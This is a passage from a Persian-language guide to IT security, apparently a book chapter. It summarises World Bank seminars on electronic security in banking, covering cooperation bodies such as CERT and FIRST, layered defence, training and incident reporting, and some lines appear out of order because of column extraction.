‫‪ ۲۲۷‬ﺑﺮﺩﺍﺷﺖ ﻣﻘﺎﺩﻳﺮ ﺑﺴﻴﺎﺭ ﻛﻢ ﺍﺯ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺣـﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﻣﺨﺘﻠـﻒ‬
‫ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻣﺜﺎﻟﻬــﺎﻳﻲ ﻛــﻪ ﺍﺯ ﺭﺧﻨــﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ‪ ،‬ﺭﺍﻩﺣﻠﻬــﺎ ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ‬
‫ﻣﺒﺘﻜﺮﺍﻧﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﭘﻲ ﻣﯽﺁﻳﻨـﺪ‪ ،‬ﺑﺮﮔﺮﻓﺘـﻪ ﺍﺯ ﺩﻭ ﺳـﻤﻴﻨﺎﺭ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺮﮔﺰﺍﺭ ﺷﺪﻩﺍﻧﺪ ‪ -‬ﺳﻤﻴﻨﺎﺭ ﺍﻭﻝ ﺑﺎ‬
‫ﻋﻨﻮﺍﻥ "ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ :‬ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﯽ" ﺩﺭ ‪ ۲۵‬ﺳﭙﺘﺎﻣﺒﺮ ‪ ،۲۰۰۲‬ﻭ "ﺍﻳﻤﻨﻲ ﻭ ﺟﺎﻣﻌﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ"‬
‫ﺩﺭ ‪ ۱۰‬ﺳــﭙﺘﺎﻣﺒﺮ ‪ .۲۰۰۳‬ﻓﻴﻠﻤﻬــﺎﯼ ﻭﻳــﺪﺋﻮﻳﻲ ﻫــﺮ ﺩﻭ ﺟﻠــﺴﻪ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ‪ ٢٢٤.‬ﺍﻳـﻦ ﻓـﺼﻞ ﺷـﺎﻣﻞ‬
‫ﻧﻜﺎﺕ ﻣﻬﻢ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭﻫﺎ ﻭ ﺗﻮﺿﻴﺤﺎﺕ ﻧﻤﺎﻳﻨـﺪﮔﺎﻥ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺷﺮﻛﺖﻛﻨﻨﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺭﺍ ﺗﺎ ﻣﺪﺗﻬﺎ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ‪،‬‬
‫ﻧﻪﺗﻨﻬﺎ ﺗﻬﺪﻳﺪﺍﺗﻲ ﭼﻨـﺪﻭﺟﻬﻲ ﻣﺜـﻞ ‪ Code Red‬ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪،‬‬
‫ﺑﻠﻜﻪ ﺧﻄﺮ ﺣﻠﻘﻪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﻧﻔﻮﺫ ﻧﻴﺰ ﻣﺤﺘﻤﻞ ﺍﺳﺖ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺣﻠﻘـﻪﻫـﺎﻱ ﻋﻤﻠﻴـﺎﺕ ﻣﺠﺮﻣﺎﻧـﻪ ﺍﺯ ﻛﺎﺯﻳﻨﻮﻫـﺎﻱ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﻌﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﭘﻮﻟﺸﻮﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻃﺒﻖ ﺗﺨﻤـﻴﻦ‬
‫ﺷﺮﻛﺖ ‪ ،Internet Data‬ﺣﺪﻭﺩ ‪ %۵۷‬ﻧﻔﻮﺫﻫـﺎ ﻋﻠﻴـﻪ ﺻـﻨﺎﻳﻊ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ‪ ،‬ﺑـﻪ ﻣـﻮﺍﺯﺍﺕ‬
‫ﭘﻴﭽﻴﺪﻩﺗﺮ ﺷﺪﻥ ﺭﻭﺷﻬﺎﻱ ﻧﻔﻮﺫ‪ ،‬ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﺎﻫﺶ‬
‫ﻣﻲ ﻳﺎﺑﺪ؛ ﭼﻮﻥ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺑﺮﺍﻱ ‪ download‬ﻭ‬
‫ﻛﺎﺭﺑﺮﺩ‪ ،‬ﺩﺭ ﺩﺳﺘﺮﺱ ﻫﻤﮕﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺣﺘـﻲ ﻛـﺴﺎﻧﻴﻜﻪ ﺩﺍﻧـﺶ‬
‫ﭼﻨﺪﺍﻥ ﻋﻤﻴﻘﻲ ﻧﺪﺍﺭﻧﺪ ﻧﻴﺰ ﺑﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻧﺎﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻗـﺪﺍﻡ ﺑـﻪ‬
‫ﻧﻔﻮﺫﻫﺎﻱ ﺑﺰﺭﮒ ﻛﻨﻨﺪ‪.‬‬
‫‪٢١٦‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﻋﺘﺒﺎﺭ ﺍﻣﻀﺎﻫﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ‪ ،‬ﻭ ﺍﻋـﻼﻡ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ‬
‫ﺍﺟﺮﺍﻳﻲ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺍﻃﻼﻋﺎﺕ؛‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣــﻦ ﭘﺮﺩﺍﺧــﺖ ﻣﻴــﺎﻥ ﺑﺎﻧﻜﻬــﺎ ﺑﺨــﺼﻮﺹ‬
‫ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛‬
‫ﭘﻮﻟــﺸﻮﻳﻲ ﻭ ﺳــﻄﺢ ﻫﻤﻜــﺎﺭﻱ ﺑــﻴﻦ ﺍﻟﻤﻠﻠــﻲ ﻛــﻪ ﺑــﺮﺍﻱ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺁﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻭ‬
‫ﺗﻮﺳﻌﻪ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ‪ ،‬ﻛﻪ ﻣﻘﻮﻟﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺠﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪.‬‬
‫•‬
‫ﻣﻤﻴﺰﻱ ﻭ ﺁﺯﻣﻮﻥ ﻓﺮﺁﻳﻨﺪﻫﺎ‪ .‬ﺑﺮﺍﻱ ﺗـﺴﺮﻳﻊ ﺭﻓـﻊ ﻭ ﺭﺟـﻮﻉ‬
‫ﻛﺎﺭﻫﺎ ﺑﺎﻳﺪ ﻫﻤﻜﺎﺭﻱ ﻭﺳﻴﻌﻲ ﻣﻴﺎﻥ ﻫﻤﺔ ﻃﺮﻓﻬﺎﻱ ﺩﺭﮔﻴـﺮ‬
‫ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎﻧﻜﻬﺎﻱ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘـﺎ ﺩﺍﺭﺍﻱ‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻫﺎﻳﻲ ﺩﺭ ‪ Antigua‬ﻫــﺴﺘﻨﺪ‪ .‬ﺍﮔــﺮ ﺍﻳــﻦ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ‪ ،‬ﺑﺎﻧﻚ ﻫﻢ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺍﺋـﻪ‬
‫ﺧﺪﻣﺎﺕ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ ،‬ﻭ ﺍﮔﺮ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺑـﺎ‬
‫ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﺷﻮﺩ‪ ،‬ﺍﻗﺪﺍﻣﺎﺕ ﻓﻮﺭﻳﺘﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ‬
‫ﺗﻌﻮﻳﻖ ﻣﻲﺍﻓﺘﺪ‪.‬‬
‫•‬
‫ﻫﻤﻜــﺎﺭﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ‪ .‬ﻣﻤﻜــﻦ ﺍﺳــﺖ‬
‫ﻣﺨﺎﻃﺮﺍﺗﻲ ﻛﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺟﻨﺒﺔ ﺣﻴﺜﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻣﻨﺠـﺮ‬
‫ﺑﻪ ﺧﻮﺩﺩﺍﺭﻱ ﺍﺯ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻥ ﺣﻮﺍﺩﺙ ﺷـﻮﻧﺪ‪ .‬ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﺑﺮﮔﺰﺍﺭﻱ ﻣﻴﺰﮔﺮﺩﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﺤـﺚ ﭘﻴﺮﺍﻣـﻮﻥ ﺿـﻮﺍﺑﻂ‬
‫ﻗﺎﻧﻮﻧﻲ ﻭ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺜﺎﻟﻬــﺎﻳﻲ ﺍﺯ ﻫﻤﻜــﺎﺭﻱ ﻭ ﺷــﺮﺍﻛﺖ ﻋﻤﻠﻴــﺎﺗﻲ ﺑﺨــﺶ‬
‫ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ ﻣﺆﺳـﺴﺔ ‪InfraGard‬‬
‫‪ NIPC‬ﻧﺎﻡ ﺑﺮﺩ‪ ،‬ﻛـﻪ ﻣﺤـﺼﻮﻝ ﻳـﻚ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ‬
‫ﻲ ﺻﻨﻌﺖ ﻭ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺑـﻮﺩ ﻭ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ‬
‫ﺗﻮﺳﻂ ‪ FBI‬ﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﺷﺪ‪ .‬ﺷـﻜﻞ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻧـﻮﻉ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﺎﻡ ‪ ٢٢٨FIRST‬ﻣﻴﺎﻥ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺗﻴﻤﻬـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﺔ ﺑﺨـﺶ ﺩﻭﻟﺘـﻲ‪ ،‬ﺍﻗﺘـﺼﺎﺩﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻲ‬
‫ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻫﺪﺍﻑ ‪ FIRST‬ﺍﻳﺠﺎﺩ ﻫﻤﺎﻫﻨﮕﻲ ﻭ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﻭﺍﻛﻨﺶ ﺳـﺮﻳﻊ‬
‫ﺑﻪ ﺣﻮﺍﺩﺙ ﺍﻣﻨﻴﺘﻲ ﻭ ﺗـﺮﻭﻳﺞ ﺍﺷـﺘﺮﺍﻙ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺳﻄﻮﺡ ﻭﺳﻴﻊ ﻋﻨـﻮﺍﻥ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺩﻳﮕـﺮ‬
‫ﻣﺜﺎﻟﻬــﺎ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ﭘﻴﻤــﺎﻥ ﺍﻣﻨﻴ ـﺖ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪ ٢٢٩‬ﻭ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ )‪(CERT‬‬
‫ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪ ،‬ﻛﻪ ﻣﺤﺼﻮﻝ ﻳﻚ ﻫﻤﻜﺎﺭﻱ ﻣـﺸﺘﺮﻙ ﻣﻴـﺎﻥ‬
‫ﻲ ‪ CERT‬ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ ‪Carnegie‬‬
‫ﻣﺮﻛﺰ ﺑـﻴﻦﺍﻟﻤﻠﻠـ ﹺ‬
‫‪ Mellon‬ﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻏﻴﺮﺩﻭﻟﺘـﻲ‬
‫ﺍﺳﺖ‪.‬‬
‫•‬
‫ﺍﻣﻨﻴــﺖ ﭼﻨﺪﻻﻳــﻪ‪ .‬ﻣﻬﻤﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺷﻴﻮﺓ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻳﻤﻨـﻲ ﺗﻨﻬـﺎ‬
‫ﺗﻮﺳﻂ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻣﻴﻦ ﻧﻤﻲﺷﻮﺩ‪ ،‬ﺑﻠﻜﻪ ﺍﻓـﺮﺍﺩ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎ‬
‫ﻧﻴﺰ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﻋﻤﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻋﺘﻤﺎﺩ ﺑﻴﺶ ﺍﺯ ﺣـﺪ ﺑـﻪ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺷﻤﻨﺪﻱ ﭼﻮﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻟﺰﻭﻣﹰﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺍ‬
‫ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻣﻨﺪ ﭘﺬﻳﺮﺵ ﺿﻮﺍﺑﻂ ﺗﻮﺳﻂ ﻋﻤﻮﻡ‪،‬‬
‫ﺩﺳﺖ ﻛﺸﻴﺪﻥ ﺍﺯ ﺗﻜـﺮﻭﻱ ﻭ ﻳﻜـﻪﺗـﺎﺯﻱ‪ ،‬ﻭ ﺑـﺎﻻ ﺑـﻮﺩﻥ ﺩﺍﻧـﺶ‬
‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻗﺒﻞ ﻣﻴـﺎﻥ ﺻـﻨﺎﻳﻊ ﻣﺘﻔـﺎﻭﺕ ﺩﺭ‬
‫ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻫﻤﻜـﺎﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ‪ ،‬ﺍﻣﻨﻴـﺖ ﭘﺮﺩﺍﺧﺘﻬـﺎﻱ‬
‫ﻼ ﺑـﻪ ﺗـﺪﺍﺧﻞ ﺑﺨـﺸﻬﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﻛـﺎﻣ ﹰ‬
‫ﻣﺨﺎﺑﺮﺍﺕ ﻭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ‪ .‬ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺷﺎﺧﺼﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ﺭﺍ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺩﺳﺘﺮﺳﻲ ﺑـﺪﻭﻥ ﺗﺒﻌـﻴﺾ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺳﺎﻟﻢ ﻭ ﺍﻣـﻦ" ﺗﻌﺮﻳـﻒ ﻛـﺮﺩ‪ ،‬ﻭ ﺍﺯ ﻃـﺮﻑ‬
‫ﺩﻳﮕﺮ ﺁﺭﻣﺎﻥ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ "ﺩﺳﺘﺮﺳـﻲ ﻫﻤﮕـﺎﻧﻲ ﺑـﺮ ﺍﺳـﺎﺱ‬
‫ﻋﻼﻗــﻪ ﻭ ﺭﻓــﺎﻩ ﻋﻤــﻮﻣﻲ" ﺑــﻮﺩ‪ .‬ﺍﻳﻨﮕﻮﻧــﻪ ﺗﻌــﺎﺭﻳﻒ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ‬
‫"ﺧﺪﻣﺎﺕ ﺍﻣﻦ"‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﺷﺒﻜﻪﻫﺎ ﻭ ﺩﺭﻧﻈـﺮ‬
‫ﮔﺮﻓﺘﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺑـﺼﻮﺭﺕ ﻫﻤﺰﻣـﺎﻥ‪ ،‬ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ‬
‫ﺑﺎ ﻭﺟﻮﺩ ﻣﺸﻜﻼﺕ ﻓﺮﺍﻭﺍﻥ ﭘـﺮﺩﺍﺧﺘﻦ ﺑـﻪ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺩﻭﮔﺎﻧـﺔ‬
‫ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ‪ ،‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﻚ ﻧﻴـﺎﺯ ﺣﻴـﺎﺗﻲ ﺑـﺮﺍﻱ‬
‫ﺑﻴﺸﺘﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻋﻤﻠـﻲ‪،‬‬
‫ﻗــﺎﻧﻮﻧﻲ ﻭ ﺣﻴﺜﻴﺘــﻲ ﺩﺭ ﻣﺤــﻴﻂ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ‪ ،‬ﺗــﻼﺵ ﻭ‬
‫ﻫﻤﺎﻫﻨﮕﻲ ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ‪ .‬ﻃﺮﺣﻬﺎﻳﻲ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ‪:‬‬
‫•‬
‫ﺁﻣﻮﺯﺵ‪ ،‬ﺁﮔـﺎﻫﻲ ﻭ ﻳـﺎﺩﮔﻴﺮﻱ ﻣﻬـﺎﺭﺕ‪ .‬ﺗﺤﻘﻴـﻖ ﺑﺎﻧـﻚ‬
‫ﺟﻬﺎﻧﻲ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺣﺪﻭﺩ ‪ %۵۰‬ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺍﮔﺮ ﺍﺟﺮﺍﻱ ﻧﺎﺩﺭﺳـﺖ‬
‫ﻲ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻴـﺰ‬
‫ﻳﺎ ﻧﺎﺗﻮﺍﻧﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺑﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻴﺎﻓﺰﺍﻳﻴﻢ‪ ،‬ﺍﻳﻦ ﺩﺭﺻﺪ ﺑﺎﺯ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ‬
‫ﻳﺎﻓﺖ‪.‬‬
‫‪228 Forum of Incident Response and Security‬‬
‫‪Teams‬‬
‫)‪229 Internet Security Alliance (www.isalliance.org‬‬
‫‪٢١٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻤﻜـﻦ ﺣﻔﺎﻇـﺖ ﻧﻤـﻲﻛﻨـﺪ‪.‬‬
‫ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ ﻭ‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺑـﺎ ﻣﻌﻤـﺎﺭﻱ ﺑـﺎﺯ ﺗﻌﺮﻳـﻒ‬
‫ﺷﺪﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭﺍﻗﻌﻲ ﻫﺮ ﻻﻳﻪ‪،‬‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﺪﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪ‬
‫ﺩﺭ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨـﺶ ﻛﺘـﺎﺏ ﺗﻮﺿـﻴﺢ ﺩﺍﺩﻩ‬
‫ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﻫﻮﺷﻤﻨﺪ(‪ .‬ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺍﺯ ﻫـﺮ ﺭﻣـﺰ‬
‫ﻋﺒﻮﺭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻜﺒﺎﺭ ﻣﻲﺗﻮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫‪.۴‬‬
‫ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ )ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺯﻧﺠﻴﺮ ﺍﻣﻨﻴﺘـﻲ( ﺭﺍ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ ﺭﻭﺷـﻬﺎ ﻭ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﺮﺍﻱ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ .‬ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻦ ﺑﺎﺷﻨﺪ‪ ،‬ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺷﺎﻣﻞ ﻧﺼﺐ ﺩﻳﻮﺍﺭﻩﻫـﺎﻱ‬
‫ﺁﺗﺶ ﺷﺨﺼﻲ‪ ٢٣٠‬ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ‬
‫ﻧﻴﺰ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪.۵‬‬
‫ﺭﻭﻳﺪﺍﺩﻫﺎ ﺑﺎﻳﺪ ﻣﺪﻳﺮﻳﺖ ﺷﺪﻩ ﻭ ﺑﺴﺮﻋﺖ ﮔﺰﺍﺭﺵ ﺷﻮﻧﺪ ﺗـﺎ‬
‫ﻧﺴﺒﺖ ﺑﻪ ﻭﺍﻛﻨﺶ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﺗـﻴﻢ ﺍﻣﻨﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺣﺎﺻﻞ ﺷﻮﺩ‪.‬‬
‫ﻧﻘﺶ ﻛﺸﻮﺭﻫﺎ‬
‫ﻫﻨﮓﻛﻨﮓ‬
‫ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺍﺩﺍﺭﺓ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ ﻫﻨﮓﻛﻨﮓ ﺑـﺎ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﺳـﻪ‬
